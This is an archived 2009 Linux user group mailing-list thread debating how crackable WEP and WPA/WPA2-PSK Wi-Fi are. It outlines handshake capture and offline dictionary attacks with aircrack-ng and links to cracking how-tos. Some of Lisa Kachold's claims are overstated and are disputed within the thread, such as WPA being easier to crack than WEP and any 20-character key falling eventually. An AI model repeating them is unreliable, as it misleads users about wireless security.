running Linux on odd devices is SOOO COOL!

Lisa Kachold lisakachold at obnosis.com
Sun Nov 15 05:57:32 MST 2009


On Saturday, November 14, 2009, Kurt Granroth
<kurt+plug-discuss at granroth.com> wrote:
> Lisa,
>
> I'll grant you the denial-of-service attack, but I'm still not finding
> any evidence that WPA is fundamentally flawed (much less "easier to
> crack... than WEP").
You simply capture the auth with airocrack-ng.
Even 20 characters can be decrypted eventually!  A dictionary attack
is faster and a truely random passwrd delays the process and  none of
this is any reason to not use security tools but the fact is the
protocol has been broken! I know I put in a nomadix and cisco aironet
with active directory and radius in 2003'
radius is anice solution; we used them for our dialup with livingstons
at Nike and various ISPs.
> I read the aircrack article earlier to see if there was new info that I
> had missed.  I also read the article you have on obnosis.com.  Finally,
> I read the LucidInteractive article you just provided.
>
> ALL of them say the same thing: the only valid attack on WPA-PSK is a
> dictionary or brute force attack!
>
> Okay, yes, it's very handy that you can do the password cracking
> offline.  But see the links I listed earlier... any decently crafted
> password will be nigh IMPOSSIBLE to crack unless you have nearly
> infinite resources -- offline or no.
>
> I realize that you likely (for sure) know more about this than I do so
> if I keep missing some fundamental flaw in PSK in all of the articles
> provided, please enlighten me!
>
> Kurt
>
> On 11/14/09 5:59 PM, Lisa Kachold wrote:
>> Kurt,
>>
>> As you stated, WPA/WPA2-PSK security is inherently flawed:
>>
>>     * One flaw allowed an attacker to cause a denial-of-service attack,
>>       if the attacker could bypass several other layers of protection.
>>     * A second flaw exists in the method with which WPA initializes its
>>       encryption scheme. Consequently, it's actually easier to crack WPA
>>       than it is to crack WEP. This flaw is the subject of this article.
>>
>>
>> A WPA key /can/ be made good enough to make cracking it unfeasible. WPA
>> is also a little more cracker friendly. By capturing the right type of
>> packets, you can do your cracking offline. This means you only have to
>> be near the AP for a matter of seconds to get what you need. WPA
>> basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS
>> is not so much.
>>
>> /_*But how many people actually have WPA RADIUS encryption?*_/
>>
>> Here's another link that includes PSK cracking Howto:
>> http://www.aircrack-ng.org/doku.php?id=cracking_wpa
>>
>> Using airocrack-ng tools in Backtrack (per my presentation materials at
>> http://plug.phoenix.az.us show) WEP and WPA/WPA2-PSK are easy to crack.
>>
>> Does anyone here run Radius?
>>
>> Here's an accompanying document to better explain it:
>> http://docs.lucidinteractive.ca/index.php/Cracking_WEP_and_WPA_Wireless_Networks
>>
>>
>> On Sat, Nov 14, 2009 at 7:32 PM, Kurt Granroth
>> <kurt+plug-discuss at granroth.com
>> <mailto:kurt%2Bplug-discuss at granroth.com>> wrote:
>>
>>     On 11/14/09 12:02 PM, Lisa Kachold wrote:
>>      > The whole concept of "wireless encryption security" is somewhat moot
>>      > with airdump-ng etc tools.
>>      >
>>      > WEP keys are really easy to break.
>>      >
>>      > WPA is also easily encroached - but harder with a truely unique
>>     secure
>>      > key (which few people use)
>>      >
>>      > It just exists as part of the big "security" matrix to keep the
>>     honest
>>      > people out.  Crackers can get right in anyway!
>>      >
>>      > http://www.obnosis.com/Layer8Wireless.html
>>
>>     Okay, I have to take exception to how this is written.  You are
>>     comparing the security of WEP and WPA as if they are somehow equivalent
>>     or equally "easy" to crack.  That is just not true.
>>
>>     WEP is fundamentally broken.  It can be reliably cracked in seconds, in
>>     most cases.  Its use is more of a "please don't use this network" flag
>>     than any real attempt to keep people out.
>>
>>     WPA, on the other hand, is NOT broken.  Only one variation of it is
>>     crackable at all (PSK) and even then, the attack is a brute force
>>     dictionary attack.  By that argument, ALL password based encryption is
>>     crackable.
>>
>>     Yes, you could successfully argue that since MOST home APs use PSK and
>>     MOST probably just set the password to 'admin' or 'linksys' or some
>>     other trivial name, that IN PRACTICE, it's not hard to crack most uses
>>     of WPA.
>>
>>     But saying that "[c]rackers can get right in anyway" just isn't true.
>>     All that is needed is a reasonably difficult password.  Don't use a
>>     dictionary word and make it decently long and it quickly becomes far too
>>     difficult to crack to make it worth it for all but the most extreme
>>     cases.  It's either VERY expensive or takes YEARS.
>>
>>     I'm sure that you read this:
>>
>>     http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>>
>>     It answers the question: "how much does it cost to crack a password?"
>>     It assumes that you are using Amazon EC2 at $0.30 an hour.  A twelve
>>     character password using the full ASCII set would cost over $8 TRILLION
>>     dollars to crack.  Even much smaller passwords are still in the
>>     millions.
>>
>>     The password that I use on my WPA2-PSK AP is 20-odd chars long and spans
>>     the ASCII range.  Far from allowing crackers to "get right in", it's
>>     nearly impossible for them to do so.
>>     ---------------------------------------------------
>>     PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>>     <mailto:PLUG-discuss at lists.plug.phoenix.az.us>
>>     To subscribe, unsubscribe, or to change your mail settings:
>>     http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>>
>>
>>
>> --
>> Skype: (623)239-3392
>> AT&T: (503)754-4452
>> www.it-clowns.com <http://www.it-clowns.com>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>

-- 
Skype: (623)239-3392
AT&T: (503)754-4452
www.it-clowns.com


More information about the PLUG-discuss mailing list